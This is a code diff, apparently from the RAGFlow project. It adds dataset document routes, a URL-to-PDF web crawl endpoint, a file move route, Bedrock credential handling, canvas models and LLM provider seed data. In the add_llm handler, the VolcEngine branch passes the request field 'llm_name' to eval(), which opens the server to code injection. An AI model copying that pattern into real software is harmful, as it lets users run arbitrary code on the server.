f"which exceeds the maximum number of uploading files: {MAXIMUM_OF_UPLOADING_FILES}")
|
||||
|
||||
# no dataset
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(message="Can't find this dataset", code=RetCode.DATA_ERROR)
|
||||
|
||||
for file_obj in file_objs:
|
||||
file_name = file_obj.filename
|
||||
# no name
|
||||
if not file_name:
|
||||
return construct_json_result(
|
||||
message="There is a file without name!", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# TODO: support the remote files
|
||||
if 'http' in file_name:
|
||||
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message="Remote files have not unsupported.")
|
||||
|
||||
# get the root_folder
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
# get the id of the root_folder
|
||||
parent_file_id = root_folder["id"] # document id
|
||||
# this is for the new user, create '.knowledgebase' file
|
||||
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
|
||||
# go inside this folder, get the kb_root_folder
|
||||
kb_root_folder = FileService.get_kb_folder(current_user.id)
|
||||
# link the file management to the kb_folder
|
||||
kb_folder = FileService.new_a_file_from_kb(dataset.tenant_id, dataset.name, kb_root_folder["id"])
|
||||
|
||||
# grab all the errs
|
||||
err = []
|
||||
MAX_FILE_NUM_PER_USER = int(os.environ.get("MAX_FILE_NUM_PER_USER", 0))
|
||||
uploaded_docs_json = []
|
||||
for file in file_objs:
|
||||
try:
|
||||
# TODO: get this value from the database as some tenants have this limit while others don't
|
||||
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(dataset.tenant_id) >= MAX_FILE_NUM_PER_USER:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="Exceed the maximum file number of a free user!")
|
||||
# deal with the duplicate name
|
||||
filename = duplicate_name(
|
||||
DocumentService.query,
|
||||
name=file.filename,
|
||||
kb_id=dataset.id)
|
||||
|
||||
# deal with the unsupported type
|
||||
filetype = filename_type(filename)
|
||||
if filetype == FileType.OTHER.value:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="This type of file has not been supported yet!")
|
||||
|
||||
# upload to the minio
|
||||
location = filename
|
||||
while MINIO.obj_exist(dataset_id, location):
|
||||
location += "_"
|
||||
|
||||
blob = file.read()
|
||||
# the content is empty, raising a warning
|
||||
if blob == b'':
|
||||
warnings.warn(f"[WARNING]: The file {filename} is empty.")
|
||||
|
||||
MINIO.put(dataset_id, location, blob)
|
||||
|
||||
doc = {
|
||||
"id": get_uuid(),
|
||||
"kb_id": dataset.id,
|
||||
"parser_id": dataset.parser_id,
|
||||
"parser_config": dataset.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": filetype,
|
||||
"name": filename,
|
||||
"location": location,
|
||||
"size": len(blob),
|
||||
"thumbnail": thumbnail(filename, blob)
|
||||
}
|
||||
if doc["type"] == FileType.VISUAL:
|
||||
doc["parser_id"] = ParserType.PICTURE.value
|
||||
if re.search(r"\.(ppt|pptx|pages)$", filename):
|
||||
doc["parser_id"] = ParserType.PRESENTATION.value
|
||||
DocumentService.insert(doc)
|
||||
|
||||
FileService.add_file_from_kb(doc, kb_folder["id"], dataset.tenant_id)
|
||||
uploaded_docs_json.append(doc)
|
||||
except Exception as e:
|
||||
err.append(file.filename + ": " + str(e))
|
||||
|
||||
if err:
|
||||
# return all the errors
|
||||
return construct_json_result(message="\n".join(err), code=RetCode.SERVER_ERROR)
|
||||
# success
|
||||
return construct_json_result(data=uploaded_docs_json, code=RetCode.SUCCESS)
|
||||
|
||||
|
||||
# ----------------------------delete a file-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["DELETE"])
|
||||
@login_required
|
||||
def delete_document(document_id, dataset_id): # string
|
||||
# get the root folder
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
# parent file's id
|
||||
parent_file_id = root_folder["id"]
|
||||
# consider the new user
|
||||
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
|
||||
# store all the errors that may have
|
||||
errors = ""
|
||||
try:
|
||||
# whether there is this document
|
||||
exist, doc = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"Document {document_id} not found!", code=RetCode.DATA_ERROR)
|
||||
# whether this doc is authorized by this tenant
|
||||
tenant_id = DocumentService.get_tenant_id(document_id)
|
||||
if not tenant_id:
|
||||
return construct_json_result(
|
||||
message=f"You cannot delete this document {document_id} due to the authorization"
|
||||
f" reason!", code=RetCode.AUTHENTICATION_ERROR)
|
||||
|
||||
# get the doc's id and location
|
||||
real_dataset_id, location = File2DocumentService.get_minio_address(doc_id=document_id)
|
||||
|
||||
if real_dataset_id != dataset_id:
|
||||
return construct_json_result(message=f"The document {document_id} is not in the dataset: {dataset_id}, "
|
||||
f"but in the dataset: {real_dataset_id}.", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# there is an issue when removing
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return construct_json_result(
|
||||
message="There was an error during the document removal process. Please check the status of the "
|
||||
"RAGFlow server and try the removal again.", code=RetCode.OPERATING_ERROR)
|
||||
|
||||
# fetch the File2Document record associated with the provided document ID.
|
||||
file_to_doc = File2DocumentService.get_by_document_id(document_id)
|
||||
# delete the associated File record.
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == file_to_doc[0].file_id])
|
||||
# delete the File2Document record itself using the document ID. This removes the
|
||||
# association between the document and the file after the File record has been deleted.
|
||||
File2DocumentService.delete_by_document_id(document_id)
|
||||
|
||||
# delete it from minio
|
||||
MINIO.rm(dataset_id, location)
|
||||
except Exception as e:
|
||||
errors += str(e)
|
||||
if errors:
|
||||
return construct_json_result(data=False, message=errors, code=RetCode.SERVER_ERROR)
|
||||
|
||||
return construct_json_result(data=True, code=RetCode.SUCCESS)
|
||||
|
||||
|
||||
# ----------------------------list files-----------------------------------------------------
|
||||
@manager.route('/<dataset_id>/documents/', methods=['GET'])
|
||||
@login_required
|
||||
def list_documents(dataset_id):
|
||||
if not dataset_id:
|
||||
return construct_json_result(
|
||||
data=False, message="Lack of 'dataset_id'", code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# searching keywords
|
||||
keywords = request.args.get("keywords", "")
|
||||
|
||||
offset = request.args.get("offset", 0)
|
||||
count = request.args.get("count", -1)
|
||||
order_by = request.args.get("order_by", "create_time")
|
||||
descend = request.args.get("descend", True)
|
||||
try:
|
||||
docs, total = DocumentService.list_documents_in_dataset(dataset_id, int(offset), int(count), order_by,
|
||||
descend, keywords)
|
||||
|
||||
return construct_json_result(data={"total": total, "docs": docs}, message=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# ----------------------------update: enable rename-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["PUT"])
|
||||
@login_required
|
||||
def update_document(dataset_id, document_id):
|
||||
req = request.json
|
||||
try:
|
||||
legal_parameters = set()
|
||||
legal_parameters.add("name")
|
||||
legal_parameters.add("enable")
|
||||
legal_parameters.add("template_type")
|
||||
|
||||
for key in req.keys():
|
||||
if key not in legal_parameters:
|
||||
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message=f"{key} is an illegal parameter.")
|
||||
|
||||
# The request body cannot be empty
|
||||
if not req:
|
||||
return construct_json_result(
|
||||
code=RetCode.DATA_ERROR,
|
||||
message="Please input at least one parameter that you want to update!")
|
||||
|
||||
# Check whether there is this dataset
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset {dataset_id} cannot be found!")
|
||||
|
||||
# The document does not exist
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document {document_id} cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# Deal with the different keys
|
||||
updating_data = {}
|
||||
if "name" in req:
|
||||
new_name = req["name"]
|
||||
updating_data["name"] = new_name
|
||||
# Check whether the new_name is suitable
|
||||
# 1. no name value
|
||||
if not new_name:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="There is no new name.")
|
||||
|
||||
# 2. In case that there's space in the head or the tail
|
||||
new_name = new_name.strip()
|
||||
|
||||
# 3. Check whether the new_name has the same extension of file as before
|
||||
if pathlib.Path(new_name.lower()).suffix != pathlib.Path(
|
||||
document.name.lower()).suffix:
|
||||
return construct_json_result(
|
||||
data=False,
|
||||
message="The extension of file cannot be changed",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# 4. Check whether the new name has already been occupied by other file
|
||||
for d in DocumentService.query(name=new_name, kb_id=document.kb_id):
|
||||
if d.name == new_name:
|
||||
return construct_json_result(
|
||||
message="Duplicated document name in the same dataset.",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
if "enable" in req:
|
||||
enable_value = req["enable"]
|
||||
if is_illegal_value_for_enum(enable_value, StatusEnum):
|
||||
return construct_json_result(message=f"Illegal value {enable_value} for 'enable' field.",
|
||||
code=RetCode.DATA_ERROR)
|
||||
updating_data["status"] = enable_value
|
||||
|
||||
# TODO: Chunk-method - update parameters inside the json object parser_config
|
||||
if "template_type" in req:
|
||||
type_value = req["template_type"]
|
||||
if is_illegal_value_for_enum(type_value, ParserType):
|
||||
return construct_json_result(message=f"Illegal value {type_value} for 'template_type' field.",
|
||||
code=RetCode.DATA_ERROR)
|
||||
updating_data["parser_id"] = req["template_type"]
|
||||
|
||||
# The process of updating
|
||||
if not DocumentService.update_by_id(document_id, updating_data):
|
||||
return construct_json_result(
|
||||
code=RetCode.OPERATING_ERROR,
|
||||
message="Failed to update document in the database! "
|
||||
"Please check the status of RAGFlow server and try again!")
|
||||
|
||||
# name part: file service
|
||||
if "name" in req:
|
||||
# Get file by document id
|
||||
file_information = File2DocumentService.get_by_document_id(document_id)
|
||||
if file_information:
|
||||
exist, file = FileService.get_by_id(file_information[0].file_id)
|
||||
FileService.update_by_id(file.id, {"name": req["name"]})
|
||||
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
|
||||
# Success
|
||||
return construct_json_result(data=document.to_json(), message="Success", code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# Helper method to judge whether it's an illegal value
|
||||
def is_illegal_value_for_enum(value, enum_class):
|
||||
return value not in enum_class.__members__.values()
|
||||
|
||||
# ----------------------------download a file-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["GET"])
|
||||
@login_required
|
||||
def download_document(dataset_id, document_id):
|
||||
try:
|
||||
# Check whether there is this dataset
|
||||
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset '{dataset_id}' cannot be found!")
|
||||
|
||||
# Check whether there is this document
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# The process of downloading
|
||||
doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id) # minio address
|
||||
file_stream = MINIO.get(doc_id, doc_location)
|
||||
if not file_stream:
|
||||
return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)
|
||||
|
||||
file = BytesIO(file_stream)
|
||||
|
||||
# Use send_file with a proper filename and MIME type
|
||||
return send_file(
|
||||
file,
|
||||
as_attachment=True,
|
||||
download_name=document.name,
|
||||
mimetype='application/octet-stream' # Set a default MIME type
|
||||
)
|
||||
|
||||
# Error
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# ----------------------------start parsing-----------------------------------------------------
|
||||
|
||||
# ----------------------------stop parsing-----------------------------------------------------
|
||||
|
||||
# ----------------------------show the status of the file-----------------------------------------------------
|
||||
|
||||
# ----------------------------list the chunks of the file-----------------------------------------------------
|
||||
|
||||
# -- --------------------------delete the chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------edit the status of the chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------insert a new chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------upload a file-----------------------------------------------------
|
||||
|
||||
# ----------------------------get a specific chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------retrieval test-----------------------------------------------------
|
||||
|
||||
|
||||
|
||||
@ -32,6 +32,7 @@ def set_dialog():
|
||||
dialog_id = req.get("dialog_id")
|
||||
name = req.get("name", "New Dialog")
|
||||
description = req.get("description", "A helpful Dialog")
|
||||
icon = req.get("icon", "")
|
||||
top_n = req.get("top_n", 6)
|
||||
top_k = req.get("top_k", 1024)
|
||||
rerank_id = req.get("rerank_id", "")
|
||||
@ -90,7 +91,8 @@ def set_dialog():
|
||||
"top_k": top_k,
|
||||
"rerank_id": rerank_id,
|
||||
"similarity_threshold": similarity_threshold,
|
||||
"vector_similarity_weight": vector_similarity_weight
|
||||
"vector_similarity_weight": vector_similarity_weight,
|
||||
"icon": icon
|
||||
}
|
||||
if not DialogService.save(**dia):
|
||||
return get_data_error_result(retmsg="Fail to new a dialog!")
|
||||
|
||||
@ -39,6 +39,8 @@ from api.settings import RetCode
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.utils.minio_conn import MINIO
|
||||
from api.utils.file_utils import filename_type, thumbnail
|
||||
from api.utils.web_utils import html2pdf, is_valid_url
|
||||
from api.utils.web_utils import html2pdf, is_valid_url
|
||||
|
||||
|
||||
@manager.route('/upload', methods=['POST'])
|
||||
@ -116,6 +118,68 @@ def upload():
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/web_crawl', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("kb_id", "name", "url")
|
||||
def web_crawl():
|
||||
kb_id = request.form.get("kb_id")
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
name = request.form.get("name")
|
||||
url = request.form.get("url")
|
||||
if not is_valid_url(url):
|
||||
return get_json_result(
|
||||
data=False, retmsg='The URL format is invalid', retcode=RetCode.ARGUMENT_ERROR)
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
||||
raise LookupError("Can't find this knowledgebase!")
|
||||
|
||||
blob = html2pdf(url)
|
||||
if not blob: return server_error_response(ValueError("Download failure."))
|
||||
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, current_user.id)
|
||||
kb_root_folder = FileService.get_kb_folder(current_user.id)
|
||||
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
|
||||
|
||||
try:
|
||||
filename = duplicate_name(
|
||||
DocumentService.query,
|
||||
name=name+".pdf",
|
||||
kb_id=kb.id)
|
||||
filetype = filename_type(filename)
|
||||
if filetype == FileType.OTHER.value:
|
||||
raise RuntimeError("This type of file has not been supported yet!")
|
||||
|
||||
location = filename
|
||||
while MINIO.obj_exist(kb_id, location):
|
||||
location += "_"
|
||||
MINIO.put(kb_id, location, blob)
|
||||
doc = {
|
||||
"id": get_uuid(),
|
||||
"kb_id": kb.id,
|
||||
"parser_id": kb.parser_id,
|
||||
"parser_config": kb.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": filetype,
|
||||
"name": filename,
|
||||
"location": location,
|
||||
"size": len(blob),
|
||||
"thumbnail": thumbnail(filename, blob)
|
||||
}
|
||||
if doc["type"] == FileType.VISUAL:
|
||||
doc["parser_id"] = ParserType.PICTURE.value
|
||||
if re.search(r"\.(ppt|pptx|pages)$", filename):
|
||||
doc["parser_id"] = ParserType.PRESENTATION.value
|
||||
DocumentService.insert(doc)
|
||||
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/create', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("name", "kb_id")
|
||||
@ -289,7 +353,7 @@ def run():
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
|
||||
if str(req["run"]) == TaskStatus.RUNNING.value:
|
||||
TaskService.filter_delete([Task.doc_id == id])
|
||||
e, doc = DocumentService.get_by_id(id)
|
||||
|
||||
@ -331,8 +331,8 @@ def get(file_id):
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
|
||||
response = flask.make_response(MINIO.get(file.parent_id, file.location))
|
||||
b, n = File2DocumentService.get_minio_address(file_id=file_id)
|
||||
response = flask.make_response(MINIO.get(b, n))
|
||||
ext = re.search(r"\.([^.]+)$", file.name)
|
||||
if ext:
|
||||
if file.type == FileType.VISUAL.value:
|
||||
@ -343,5 +343,28 @@ def get(file_id):
|
||||
'application/%s' %
|
||||
ext.group(1))
|
||||
return response
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/mv', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("src_file_ids", "dest_file_id")
|
||||
def move():
|
||||
req = request.json
|
||||
try:
|
||||
file_ids = req["src_file_ids"]
|
||||
parent_id = req["dest_file_id"]
|
||||
for file_id in file_ids:
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="File or Folder not found!")
|
||||
if not file.tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
fe, _ = FileService.get_by_id(parent_id)
|
||||
if not fe:
|
||||
return get_data_error_result(retmsg="Parent Folder not found!")
|
||||
FileService.move_file(file_ids, parent_id)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
@ -109,15 +109,23 @@ def set_api_key():
|
||||
def add_llm():
|
||||
req = request.json
|
||||
factory = req["llm_factory"]
|
||||
# For VolcEngine, due to its special authentication method
|
||||
# Assemble volc_ak, volc_sk, endpoint_id into api_key
|
||||
|
||||
if factory == "VolcEngine":
|
||||
# For VolcEngine, due to its special authentication method
|
||||
# Assemble volc_ak, volc_sk, endpoint_id into api_key
|
||||
temp = list(eval(req["llm_name"]).items())[0]
|
||||
llm_name = temp[0]
|
||||
endpoint_id = temp[1]
|
||||
api_key = '{' + f'"volc_ak": "{req.get("volc_ak", "")}", ' \
|
||||
f'"volc_sk": "{req.get("volc_sk", "")}", ' \
|
||||
f'"ep_id": "{endpoint_id}", ' + '}'
|
||||
elif factory == "Bedrock":
|
||||
# For Bedrock, due to its special authentication method
|
||||
# Assemble bedrock_ak, bedrock_sk, bedrock_region
|
||||
llm_name = req["llm_name"]
|
||||
api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
|
||||
f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
|
||||
f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
|
||||
else:
|
||||
llm_name = req["llm_name"]
|
||||
api_key = "xxxxxxxxxxxxxxx"
|
||||
@ -134,7 +142,9 @@ def add_llm():
|
||||
msg = ""
|
||||
if llm["model_type"] == LLMType.EMBEDDING.value:
|
||||
mdl = EmbeddingModel[factory](
|
||||
key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
|
||||
key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
|
||||
model_name=llm["llm_name"],
|
||||
base_url=llm["api_base"])
|
||||
try:
|
||||
arr, tc = mdl.encode(["Test if the api key is available"])
|
||||
if len(arr[0]) == 0 or tc == 0:
|
||||
@ -143,7 +153,7 @@ def add_llm():
|
||||
msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
|
||||
elif llm["model_type"] == LLMType.CHAT.value:
|
||||
mdl = ChatModel[factory](
|
||||
key=llm['api_key'] if factory == "VolcEngine" else None,
|
||||
key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
|
||||
model_name=llm["llm_name"],
|
||||
base_url=llm["api_base"]
|
||||
)
|
||||
|
||||
16
api/contants.py
Normal file
16
api/contants.py
Normal file
@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
NAME_LENGTH_LIMIT = 2 ** 10
|
||||
@ -91,4 +91,9 @@ class FileSource(StrEnum):
|
||||
KNOWLEDGEBASE = "knowledgebase"
|
||||
S3 = "s3"
|
||||
|
||||
|
||||
class CanvasType(StrEnum):
|
||||
ChatBot = "chatbot"
|
||||
DocBot = "docbot"
|
||||
|
||||
KNOWLEDGEBASE_FOLDER_NAME=".knowledgebase"
|
||||
@ -833,6 +833,31 @@ class API4Conversation(DataBaseModel):
|
||||
db_table = "api_4_conversation"
|
||||
|
||||
|
||||
class UserCanvas(DataBaseModel):
|
||||
id = CharField(max_length=32, primary_key=True)
|
||||
avatar = TextField(null=True, help_text="avatar base64 string")
|
||||
user_id = CharField(max_length=255, null=False, help_text="user_id")
|
||||
title = CharField(max_length=255, null=True, help_text="Canvas title")
|
||||
description = TextField(null=True, help_text="Canvas description")
|
||||
canvas_type = CharField(max_length=32, null=True, help_text="Canvas type")
|
||||
dsl = JSONField(null=True, default={})
|
||||
|
||||
class Meta:
|
||||
db_table = "user_canvas"
|
||||
|
||||
|
||||
class CanvasTemplate(DataBaseModel):
|
||||
id = CharField(max_length=32, primary_key=True)
|
||||
avatar = TextField(null=True, help_text="avatar base64 string")
|
||||
title = CharField(max_length=255, null=True, help_text="Canvas title")
|
||||
description = TextField(null=True, help_text="Canvas description")
|
||||
canvas_type = CharField(max_length=32, null=True, help_text="Canvas type")
|
||||
dsl = JSONField(null=True, default={})
|
||||
|
||||
class Meta:
|
||||
db_table = "canvas_template"
|
||||
|
||||
|
||||
def migrate_db():
|
||||
with DB.transaction():
|
||||
migrator = MySQLMigrator(DB)
|
||||
|
||||
@ -13,6 +13,7 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
import os
|
||||
import time
|
||||
import uuid
|
||||
@ -21,11 +22,13 @@ from copy import deepcopy
|
||||
from api.db import LLMType, UserTenantRole
|
||||
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
|
||||
from api.db.services import UserService
|
||||
from api.db.services.canvas_service import CanvasTemplateService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
|
||||
|
||||
def init_superuser():
|
||||
@ -152,6 +155,26 @@ factory_infos = [{
|
||||
"logo": "",
|
||||
"tags": "TEXT EMBEDDING, TEXT RE-RANK",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "MiniMax",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Mistral",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Azure-OpenAI",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Bedrock",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
}
|
||||
# {
|
||||
# "name": "文心一言",
|
||||
@ -380,8 +403,8 @@ def init_llm_factory():
|
||||
{
|
||||
"fid": factory_infos[7]["name"],
|
||||
"llm_name": "maidalun1020/bce-reranker-base_v1",
|
||||
"tags": "RE-RANK, 8K",
|
||||
"max_tokens": 8196,
|
||||
"tags": "RE-RANK, 512",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
# ------------------------ DeepSeek -----------------------
|
||||
@ -536,6 +559,346 @@ def init_llm_factory():
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.RERANK.value
|
||||
},
|
||||
# ------------------------ Minimax -----------------------
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5s-chat",
|
||||
"tags": "LLM,CHAT,245k",
|
||||
"max_tokens": 245760,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5t-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab6.5g-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab5.5-chat",
|
||||
"tags": "LLM,CHAT,16k",
|
||||
"max_tokens": 16384,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[13]["name"],
|
||||
"llm_name": "abab5.5s-chat",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
# ------------------------ Mistral -----------------------
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "open-mixtral-8x22b",
|
||||
"tags": "LLM,CHAT,64k",
|
||||
"max_tokens": 64000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "open-mixtral-8x7b",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "open-mistral-7b",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-large-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-small-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-medium-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "codestral-latest",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[14]["name"],
|
||||
"llm_name": "mistral-embed",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.EMBEDDING
|
||||
},
|
||||
# ------------------------ Azure OpenAI -----------------------
|
||||
# Please ensure the llm_name is the same as the name in Azure
|
||||
# OpenAI deployment name (e.g., azure-gpt-4o). And the llm_name
|
||||
# must different from the OpenAI llm_name
|
||||
#
|
||||
# Each model must be deployed in the Azure OpenAI service, otherwise,
|
||||
# you will receive an error message 'The API deployment for
|
||||
# this resource does not exist'
|
||||
{
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4o",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value + "," + LLMType.IMAGE2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-35-turbo",
|
||||
"tags": "LLM,CHAT,4K",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-35-turbo-16k",
|
||||
"tags": "LLM,CHAT,16k",
|
||||
